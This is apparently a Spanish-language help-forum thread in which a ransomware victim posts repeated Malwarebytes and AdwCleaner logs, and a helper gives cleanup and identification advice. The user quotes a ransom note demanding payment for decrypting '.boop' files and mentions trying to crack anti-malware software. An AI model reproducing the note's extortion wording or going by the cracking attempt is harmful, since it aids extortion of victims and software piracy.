PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , E4220B10D32849DDC74E2CC0D6412C0C, CAE0165B9D288E42331CD91BC811A4B2E8BAF24B3AB39117511785FB02B4DDBC
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000062.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , 0DBA84F3F28068B8578763326AEE9614, D399A96B7FB8F00F139CAD18E3C343BF2B6E06C047C193F9D93BF0033406170C
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000064.log, Sin acciones por parte del usuario, 198, 454805, , , , , 11082CBDDDE6F89B0F81CBFA593E8CC8, 51A9F412F0B38053CC921ED07AD8B6179F4D9AB8EFAA50621E063A2DA872BD81
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000065.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , 2B91617EF9DBA0E5BE1A4A1A18F9A9EA, 39A1D6DD0FC2C6F897E700D612DA80A1A6C10CC1FFB03BB9977281305F6C3A50
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, Sin acciones por parte del usuario, 198, 454805, , , , , 46295CAC801E5D4857D09837238A6394, 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, Sin acciones por parte del usuario, 198, 454805, , , , , ,
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, Sin acciones por parte del usuario, 198, 454805, , , , , 700F51D1945A1058DACE2C5157AC4876, DC0BDD9819AA3C518DFB5A920BFFA3620E46216F678A4A5019C9F584CCE9AFB2
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old, Sin acciones por parte del usuario, 198, 454805, , , , , 424F77B195B93391C746F1F52C9DCF44, 03B71B53BED9F14EC731A2163D35AC32E7C3D8A9DA00D55C9C70D7B9DA9838D6
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, Sin acciones por parte del usuario, 198, 454805, , , , , F68E3EFE535ECF41FE26CE1AF3FA92DA, 13E5D016766A1DC45696D9212C9AE977CE7B2E5D2412C3D10D814D5F8E167ECB
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 198, 454805, 1.0.29029, , ame, , 324C8A0A91AA10EE0BB6364D3B6B6BE9, D9B63C6F179EF8840B206CE85961904CB387B09D195969AC4073683ABA3485C4
Malware.AI.3046703087, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\JFIAG_GG.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.29029, C0264A863E170605B598FFEF, dds, 00867499, A6279EC92FF948760CE53BBA817D6A77, 8B581869BF8944A8E0AA169ADEA2A4AFE47434123DA477132880AFF6A5032181
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 297, 454688, 1.0.29029, , ame, , 324C8A0A91AA10EE0BB6364D3B6B6BE9, D9B63C6F179EF8840B206CE85961904CB387B09D195969AC4073683ABA3485C4
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 435, 519968, 1.0.29029, , ame, , 324C8A0A91AA10EE0BB6364D3B6B6BE9, D9B63C6F179EF8840B206CE85961904CB387B09D195969AC4073683ABA3485C4
Sector físico: 0
(No hay elementos maliciosos detectados)
WMI: 0
(No hay elementos maliciosos detectados)
(end)
# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build: 07-22-2020
# Database: 2020-07-20.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 08-25-2020
# Duration: 00:00:08
# OS: Windows 10 Pro
# Cleaned: 31
# Failed: 0
***** [ Services ] *****
Deleted SecurityService
Deleted WinDefender
Deleted webshieldfilter
***** [ Folders ] *****
Deleted C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted C:\Program Files (x86)\TotalAV
Deleted C:\ProgramData\IObit\Advanced SystemCare
Deleted C:\ProgramData\SecuritySuite
Deleted C:\ProgramData\TotalAV
Deleted C:\Users\Hetitor\AppData\LocalLow\IObit\Advanced SystemCare
Deleted C:\Users\Hetitor\AppData\Roaming\IObit\Advanced SystemCare
Deleted C:\Users\Hetitor\AppData\Roaming\Tencent
Deleted C:\Users\Hetitor\Documents\TotalAV
Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\TotalAV
Deleted C:\Windows\Temp\Smartbar
Deleted C:\Windows\rss
***** [ Files ] *****
Deleted C:\Users\Hetitor\appdata\local\installationconfiguration.xml
Deleted C:\Windows\System32\drivers\webshieldfilter.sys
Deleted C:\Windows\windefender.exe
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
Deleted C:\Windows\System32\Tasks\SCHEDULEDUPDATE
***** [ Registry ] *****
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Run|cloudnet
Deleted HKCU\Software\SSProtect
Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2C5B258-7042-4216-8B57-E601084A0631}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\Software\Wow6432Node\IOBIT\ASC
Deleted HKLM\Software\Wow6432Node\IObit\Advanced SystemCare
Deleted HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\TotalAV
Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
Deleted WebSearch
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build: 07-22-2020
# Database: 2020-07-20.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 08-25-2020
# Duration: 00:00:40
# OS: Windows 10 Pro
# Scanned: 31837
# Detected: 31
***** [ Services ] *****
PUP.Adware.Heuristic webshieldfilter
PUP.Optional.Legacy WinDefender
PUP.Optional.PCProtect SecurityService
***** [ Folders ] *****
PUP.Optional.AdvancedSystemCare C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\ProgramData\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Users\Hetitor\AppData\LocalLow\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Users\Hetitor\AppData\Roaming\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
PUP.Optional.Legacy C:\Program Files (x86)\TotalAV
PUP.Optional.Legacy C:\ProgramData\TotalAV
PUP.Optional.Legacy C:\Users\Hetitor\AppData\Roaming\Tencent
PUP.Optional.Legacy C:\Users\Hetitor\Documents\TotalAV
PUP.Optional.Legacy C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\TotalAV
PUP.Optional.PCProtect C:\ProgramData\SecuritySuite
PUP.Optional.SmartBar C:\Windows\Temp\Smartbar
Trojan.Agent C:\Windows\rss
***** [ Files ] *****
PUP.Optional.Legacy C:\Users\Hetitor\appdata\local\installationconfiguration.xml
PUP.Optional.PCProtect C:\Windows\System32\drivers\webshieldfilter.sys
Trojan.Agent C:\Windows\windefender.exe
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
Adware.CloudWeb C:\Windows\System32\Tasks\SCHEDULEDUPDATE
***** [ Registry ] *****
Adware.CloudWeb HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2C5B258-7042-4216-8B57-E601084A0631}
Adware.CloudWeb HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
PUP.Optional.AdvancedSystemCare HKLM\Software\Wow6432Node\IOBIT\ASC
PUP.Optional.AdvancedSystemCare HKLM\Software\Wow6432Node\IObit\Advanced SystemCare
PUP.Optional.Glupteba HKCU\Software\Microsoft\Windows\CurrentVersion\Run|cloudnet
PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\TotalAV
PUP.Optional.PCProtect HKCU\Software\SSProtect
PUP.Optional.PCProtect HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
PUP.Optional.TotalAV HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
PUP.Optional.TotalAV HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
PUP.Optional.Legacy WebSearch
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
***** [ Hosts File Entries ] *****
No malicious hosts file entries found.
***** [ Preinstalled Software ] *****
No Preinstalled Software found.
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build: 07-22-2020
# Database: 2020-07-20.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 08-25-2020
# Duration: 00:00:08
# OS: Windows 10 Pro
# Cleaned: 31
# Failed: 0
***** [ Services ] *****
Deleted SecurityService
Deleted WinDefender
Deleted webshieldfilter
***** [ Folders ] *****
Deleted C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted C:\Program Files (x86)\TotalAV
Deleted C:\ProgramData\IObit\Advanced SystemCare
Deleted C:\ProgramData\SecuritySuite
Deleted C:\ProgramData\TotalAV
Deleted C:\Users\Hetitor\AppData\LocalLow\IObit\Advanced SystemCare
Deleted C:\Users\Hetitor\AppData\Roaming\IObit\Advanced SystemCare
Deleted C:\Users\Hetitor\AppData\Roaming\Tencent
Deleted C:\Users\Hetitor\Documents\TotalAV
Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\TotalAV
Deleted C:\Windows\Temp\Smartbar
Deleted C:\Windows\rss
***** [ Files ] *****
Deleted C:\Users\Hetitor\appdata\local\installationconfiguration.xml
Deleted C:\Windows\System32\drivers\webshieldfilter.sys
Deleted C:\Windows\windefender.exe
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
Deleted C:\Windows\System32\Tasks\SCHEDULEDUPDATE
***** [ Registry ] *****
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Run|cloudnet
Deleted HKCU\Software\SSProtect
Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2C5B258-7042-4216-8B57-E601084A0631}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\Software\Wow6432Node\IOBIT\ASC
Deleted HKLM\Software\Wow6432Node\IObit\Advanced SystemCare
Deleted HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\TotalAV
Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
Deleted WebSearch
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [3737 octets] - [25/08/2020 08:41:34]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
Por último informo que había pasado el Spy hunter que detectó muchos malwares, pero como los limpia recién después de 48 hs, la limpieza se efectuará recién mañana al mediodía.
Hola buenos días, recién acabo de poder eliminar lo que había encontrado el Spyhunter, y volví a pasar el Malwarebytes y el ADWCleaner, de los que adjunto informes. Peor además quería comentar que he encontrado una nota en el directorio Temp de uno de mis tres discos que adjunto. Por otra parte gran cantidad de archivos están afectados por la modificación de sus etensiones a los que se les adicionó “.boop”, y cuando los quito, instantameamente se regenera impidiéndome utiizarlos. Nota extorsiva ATTENTION!
Don’t worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool:
Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that’s price for you is $490. Please note that you’ll never restore your data without payment. Check your e-mail “Spam” or “Junk” folder if you don’t get answer more than 6 hours.To get this software you need write on our e-mail: [email protected]
Reserve e-mail address to contact us: [email protected]
Your personal ID: 0247regyjnkjddrtnKU4a1JBo2jjryZKaRUKSk4YSnJwGznhWBeqBlbE
---------------–----*-
Malwarebytes
www.malwarebytes.com
-Detalles del registro-
Fecha del análisis: 26/8/20
Hora del análisis: 13:06
Archivo de registro: 124f1e00-e7b6-11ea-b65b-2cf05d3fbd97.json
-Información del software-
Versión: 4.2.0.82
Versión de los componentes: 1.0.1025
Versión del paquete de actualización: 1.0.29083
Licencia: Prueba
-Información del sistema-
SO: Windows 10 (Build 18362.1016)
CPU: x64
Sistema de archivos: NTFS
Usuario: DESKTOP-7O23KFE\Hetitor
-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 314699
Amenazas detectadas: 13
Amenazas en cuarentena: 0
Tiempo transcurrido: 1 min, 6 seg
-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar
-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)
Módulo: 0
(No hay elementos maliciosos detectados)
Clave del registro: 0
(No hay elementos maliciosos detectados)
Valor del registro: 0
(No hay elementos maliciosos detectados)
Datos del registro: 0
(No hay elementos maliciosos detectados)
Secuencia de datos: 0
(No hay elementos maliciosos detectados)
Carpeta: 3
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 198, 454805, , , , , ,
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 435, 519968, , , , , ,
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 297, 454688, , , , , ,
Archivo: 10
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , 713CB829A75F218EA7A48E2A248BA52F, 481794C95F4BB6E9F4689C6A2E0A6BDCA9C7509323765DC899B4BECF4E020796
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000006.log, Sin acciones por parte del usuario, 198, 454805, , , , , 2B4FF078A6FFE4A1192F0608B0A890BC, 9756A227D637D087673DE417205DAA2B8C8ED7A4ACCA191E58D5193259CB65E1
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , B567B24EA1F49153F3309536DEF9AD3C, A0D32998AAAA0671FCF93FBDD3EB5EC0040EFB922C1E8D4913E63304DBD2A412
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, Sin acciones por parte del usuario, 198, 454805, , , , , 46295CAC801E5D4857D09837238A6394, 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, Sin acciones por parte del usuario, 198, 454805, , , , , ,
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, Sin acciones por parte del usuario, 198, 454805, , , , , 945C6DED4612022BAE8E2A6B368E71F7, A7D7181F6238C6298740345F6192F249B9E8BA212CF34AD5967542BE901B1AB3
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, Sin acciones por parte del usuario, 198, 454805, , , , , A8784F3C7A06B766A58795033BB26A93, 665588604D7EA5CE0EA9124133ECE0DB935DFD14DE723FBC9CDA539724C36EF7
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 198, 454805, 1.0.29083, , ame, , 1DD607DF1FBE773AE86274F437323C76, 04DE80F3EDFF20E0D4E7B405C4B9EF64B90BB6AAD3DD9F41698836161C483FBC
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 435, 519968, 1.0.29083, , ame, , 1DD607DF1FBE773AE86274F437323C76, 04DE80F3EDFF20E0D4E7B405C4B9EF64B90BB6AAD3DD9F41698836161C483FBC
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 297, 454688, 1.0.29083, , ame, , 1DD607DF1FBE773AE86274F437323C76, 04DE80F3EDFF20E0D4E7B405C4B9EF64B90BB6AAD3DD9F41698836161C483FBC
Sector físico: 0
(No hay elementos maliciosos detectados)
WMI: 0
(No hay elementos maliciosos detectados)
(end)
Malwarebytes
www.malwarebytes.com
-Detalles del registro-
Fecha del análisis: 26/8/20
Hora del análisis: 13:06
Archivo de registro: 124f1e00-e7b6-11ea-b65b-2cf05d3fbd97.json
-Información del software-
Versión: 4.2.0.82
Versión de los componentes: 1.0.1025
Versión del paquete de actualización: 1.0.29083
Licencia: Prueba
-Información del sistema-
SO: Windows 10 (Build 18362.1016)
CPU: x64
Sistema de archivos: NTFS
Usuario: DESKTOP-7O23KFE\Hetitor
-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 314699
Amenazas detectadas: 13
Amenazas en cuarentena: 0
Tiempo transcurrido: 1 min, 6 seg
-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar
-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)
Módulo: 0
(No hay elementos maliciosos detectados)
Clave del registro: 0
(No hay elementos maliciosos detectados)
Valor del registro: 0
(No hay elementos maliciosos detectados)
Datos del registro: 0
(No hay elementos maliciosos detectados)
Secuencia de datos: 0
(No hay elementos maliciosos detectados)
Carpeta: 3
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 198, 454805, , , , , ,
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 435, 519968, , , , , ,
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 297, 454688, , , , , ,
Archivo: 10
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , 713CB829A75F218EA7A48E2A248BA52F, 481794C95F4BB6E9F4689C6A2E0A6BDCA9C7509323765DC899B4BECF4E020796
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000006.log, Sin acciones por parte del usuario, 198, 454805, , , , , 2B4FF078A6FFE4A1192F0608B0A890BC, 9756A227D637D087673DE417205DAA2B8C8ED7A4ACCA191E58D5193259CB65E1
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.ldb, Sin acciones por parte del usuario, 198, 454805, , , , , B567B24EA1F49153F3309536DEF9AD3C, A0D32998AAAA0671FCF93FBDD3EB5EC0040EFB922C1E8D4913E63304DBD2A412
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, Sin acciones por parte del usuario, 198, 454805, , , , , 46295CAC801E5D4857D09837238A6394, 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, Sin acciones por parte del usuario, 198, 454805, , , , , ,
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, Sin acciones por parte del usuario, 198, 454805, , , , , 945C6DED4612022BAE8E2A6B368E71F7, A7D7181F6238C6298740345F6192F249B9E8BA212CF34AD5967542BE901B1AB3
PUP.Optional.Linkury.Generic, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, Sin acciones por parte del usuario, 198, 454805, , , , , A8784F3C7A06B766A58795033BB26A93, 665588604D7EA5CE0EA9124133ECE0DB935DFD14DE723FBC9CDA539724C36EF7
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 198, 454805, 1.0.29083, , ame, , 1DD607DF1FBE773AE86274F437323C76, 04DE80F3EDFF20E0D4E7B405C4B9EF64B90BB6AAD3DD9F41698836161C483FBC
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 435, 519968, 1.0.29083, , ame, , 1DD607DF1FBE773AE86274F437323C76, 04DE80F3EDFF20E0D4E7B405C4B9EF64B90BB6AAD3DD9F41698836161C483FBC
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 297, 454688, 1.0.29083, , ame, , 1DD607DF1FBE773AE86274F437323C76, 04DE80F3EDFF20E0D4E7B405C4B9EF64B90BB6AAD3DD9F41698836161C483FBC
Sector físico: 0
(No hay elementos maliciosos detectados)
WMI: 0
(No hay elementos maliciosos detectados)
(end)
Hola
Pudo terminar algún análisis? En los reportes no se ve que se enviara a cuarentena lo que detectó.
Si sigue sin poder terminar, analiza en modo seguro a ver si realiza los análisis completos.
Spyhunter pagas la licencia? Si no es así no sirve para nada mejor que lo desinstales.
Este es un problema bastante gordo, te has infectado con un ransomware.
Lo primero que debes hacer es intentar identificar correctamente el tipo y/o variante que te ha infectado, para hacerlo revisa este tema y compruébalo ID-Ransomware: ¿Cómo identificar el Ransomware que lo ha infectado?
Dependiendo que esa infección/variante fuera de las que tienen método/herramienta de recuperación de ficheros(te indicará cual es), quizás puedas lograrlo, pero desgraciadamente en su gran mayoría NO es posible.
Comenta lo que te ha indicado y los resultados obtenidos.
Pon los reportes de Malwarebytes y AdwCleaner si se han podido terminar en modo seguro, si no me comentas.
Un saludo
Hola Daniela, He ingresado al sitio que me indicaste y mas abajo te adjunto el informe de limpieza de ese software. Tmbien adjunto útimo informe de Malwarebytes. El AdwCleaner solo encuentra 3 Pup de Iobit AVS (Cuyo único peligro es er enemigo de MB). Por otro lado pasé el
GridinSoft Anti-malware, del que adjunto el informe de hallazgos (no pude eliminarlos porque no me toma al Crack (a pesa de haber desactivado toda defensa) porque cuando busca el archivo .exe a modificar no lo encuentra, he comprobado que algo le ocuta todo los archivos del directorio. Te pregunto ¿como es posible que el MB, me muestre que está todo Ok. y el Gridin encuentre 115 elementos peligrosos?.
Y por último acabo de comprobar que me ha desaparecido todo un directorio con 46 programas MULTIMEDIALES, con los que suelo hacer mis trabajos.
Aqui van los informes:
Malwarebytes
www.malwarebytes.com
-Detalles del registro-
Fecha del análisis: 28/8/20
Hora del análisis: 8:09
Archivo de registro: eda14546-e91e-11ea-8fa4-2cf05d3fbd97.json
-Información del software-
Versión: 4.2.0.82
Versión de los componentes: 1.0.1025
Versión del paquete de actualización: 1.0.29159
Licencia: Prueba
-Información del sistema-
SO: Windows 10 (Build 18362.1016)
CPU: x64
Sistema de archivos: NTFS
Usuario: System
-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Programador de tareas
Resultado: Completado
Objetos analizados: 318573
Amenazas detectadas: 18
Amenazas en cuarentena: 18
Tiempo transcurrido: 2 min, 54 seg
-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar
-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)
Módulo: 0
(No hay elementos maliciosos detectados)
Clave del registro: 0
(No hay elementos maliciosos detectados)
Valor del registro: 0
(No hay elementos maliciosos detectados)
Datos del registro: 0
(No hay elementos maliciosos detectados)
Secuencia de datos: 0
(No hay elementos maliciosos detectados)
Carpeta: 3
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 297, 454688, , , , , ,
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 435, 519968, , , , , ,
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 198, 454805, , , , , ,
Archivo: 15
HackTool.FilePatch, C:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RQ3ID63.EXE, En cuarentena, 7500, 281135, 1.0.29159, F200F021B39DBE72D8B5D626, dds, 00871568, 1548E20E6F2FD60F7897908881EC86D7, 921725B58AB269C3D03BD802876D3CB5CD484CAD8B084420EEB7276A92297940
HackTool.FilePatch, C:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RUWUPDZ.EXE, En cuarentena, 7500, 281135, 1.0.29159, F200F021B39DBE72D8B5D626, dds, 00871568, 1548E20E6F2FD60F7897908881EC86D7, 921725B58AB269C3D03BD802876D3CB5CD484CAD8B084420EEB7276A92297940
